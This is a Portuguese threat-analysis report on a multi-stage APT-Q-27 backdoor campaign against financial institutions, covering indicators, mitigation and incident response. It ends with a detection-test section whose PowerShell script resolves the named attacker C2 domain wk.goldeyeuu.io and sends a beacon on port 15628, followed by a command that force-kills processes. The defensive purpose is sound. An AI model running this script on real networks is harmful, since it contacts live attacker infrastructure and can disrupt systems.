Análise de Malware Suspeito Relacionado com APT-Q-27 Alvejando Instituições Financeiras

Resumo

A campanha apresenta uma cadeia de infecção em várias etapas que começa com um link de phishing disfarçado de download de imagem, que na verdade entrega um .pif dropper. O payload inicial é um executável .NET fortemente ofuscado, assinado com um certificado legítimo que foi posteriormente revogado—ajudando a escapar dos controles baseados em reputação no início. Após a execução, ele organiza componentes dentro de um diretório projetado para se assemelhar a um cache de atualização do Windows, e depois transita para execução apenas na memória para reduzir evidências no disco. O resultado final é uma backdoor modular que prioriza a furtividade e evasão, mantendo o acesso através de persistência baseada em serviço enquanto tenta evitar detecções comuns de assinatura.

Investigação

Os analistas da CyStack rastrearam a URL de entrega inicial para infraestrutura hospedada em storage.googleapis.com e recuperaram artefatos organizados—updat.exe, crashreport.dll, e updat.log—de uma pasta oculta semelhante a um cache. O dropper estabelece persistência básica através de um valor de registro Run e, subsequentemente, registra um serviço do Windows chamado Windows Eventn para manter a execução a longo prazo. A backdoor implementa verificações anti-análise, tenta elevação de privilégio e altera configurações relacionadas ao UAC para reduzir prompts do usuário. O tráfego de comando e controle foi observado na porta 15628, e os investigadores extraíram indicadores prontos para detecção incluindo nomes de arquivos, caminhos de registro, identificadores de serviço e cadeias de user-agent distintas.

Mitigação

Aplique controles de download rigorosos para bloquear arquivos .pif e imponha a validação do tipo de conteúdo para que links de “imagem” não entreguem silenciosamente executáveis. Reforce a aplicação de assinatura de código validando o status de revogação e os carimbos de data/hora do certificado durante a execução. Monitore diretórios de cache ocultos semelhantes a “Windows Update” e alerte sobre adições inesperadas de chaves Run ou eventos suspeitos de criação de serviço. Bloqueie as configurações de política do UAC e revise regularmente as alterações nas chaves de política de registro relevantes.

Resposta

Se a atividade for detectada, isole o endpoint imediatamente e colete artefatos forenses (imagem de memória, hives de registro e evidências do sistema de arquivos) antes da remediação. Termine e remova o serviço malicioso Windows Eventn e examine o ambiente em busca dos indicadores recuperados—especialmente arquivos de estágio ocultos, possível uso de mutex e quaisquer vestígios de carregamento lateral de DLL. Redefina credenciais potencialmente expostas, revise atividades de contas privilegiadas em busca de abuso e atualize as detecções nos EDR/SIEM com os IOCs extraídos.

Execução de Simulação

Pré-requisito: O Check de Pré-voo de Telemetria & Baseline deve ter sido aprovado.

Justificativa: Esta seção detalha a execução precisa da técnica do adversário (TTP) projetada para acionar a regra de detecção. Os comandos e narrativas DEVEM refletir diretamente os TTPs identificados e visam gerar exatamente a telemetria esperada pela lógica de detecção. Exemplos abstratos ou não relacionados levarão a um diagnóstico incorreto.

• Narrativa do Ataque & Comandos:
  Um atacante que conseguiu uma posição inicial no host Windows deseja estabelecer um túnel C2 encoberto para a infraestrutura do APT‑Q‑27. Usando um back‑door personalizado do PowerShell, o operador resolve o domínio codificado wk.goldeyeuu.io e abre uma conexão TCP na porta 15628. O tráfego é permitido no sentido de saída pelo firewall, e como a conexão usa uma porta não padrão, ela se destaca nos logs do firewall. O atacante então transmite comandos codificados por este canal (T1059) para executar mais payloads.

  Passo a Passo:

  1. Resolva o domínio C2 para verificar se o DNS funciona.
  2. Abra um soquete TCP bruto para o IP resolvido na porta 15628.
  3. Envie um payload “ping” simples para confirmar a conectividade (simulando um beacon).

• Script de Teste de Regressão:

  # -----------------------------------------------------------------------------------------------------------------
  # Simular Comunicação C2 para wk.goldeyeuu.io na porta 15628
  # -----------------------------------------------------------------------------------------------------------------
  # Resolver o domínio malicioso (esperado retorno de um IP controlado pela Equipe Vermelha)
  $c2Domain = "wk.goldeyeuu.io"
  try {
      $c2IP = [System.Net.Dns]::GetHostAddresses($c2Domain) |
               Where-Object { $_.AddressFamily -eq [System.Net.Sockets.AddressFamily]::InterNetwork } |
               Select-Object -First 1
  } catch {
      Write-Error "Falha na resolução DNS para $c2Domain"
      exit 1
  }
  
  # Estabelecer uma conexão TCP na porta não padrão 15628
  $c2Port = 15628
  $client = New-Object System.Net.Sockets.TcpClient
  try {
      $client.Connect($c2IP.IPAddressToString, $c2Port)
      Write-Host "Conectado ao $c2Domain ($($c2IP.IPAddressToString)):`$c2Port"
  } catch {
      Write-Error "Falha na conexão com $c2Domain na porta $c2Port"
      exit 1
  }
  
  # Enviar um payload de beacon simples (PING em ASCII) e fechar a conexão
  $stream = $client.GetStream()
  $payload = [System.Text.Encoding]::ASCII.GetBytes("PING")
  $stream.Write($payload, 0, $payload.Length)
  $stream.Flush()
  Write-Host "Payload de beacon enviado."
  
  # Limpeza
  $stream.Close()
  $client.Close()
  # -----------------------------------------------------------------------------------------------------------------

• Comandos de Limpeza:

  # Garantir que quaisquer conexões TCP remanescentes sejam fechadas (medida defensiva para o ambiente de teste)
  Get-NetTCPConnection -RemotePort 15628 -State Established |
      ForEach-Object { Stop-Process -Id $_.OwningProcess -Force }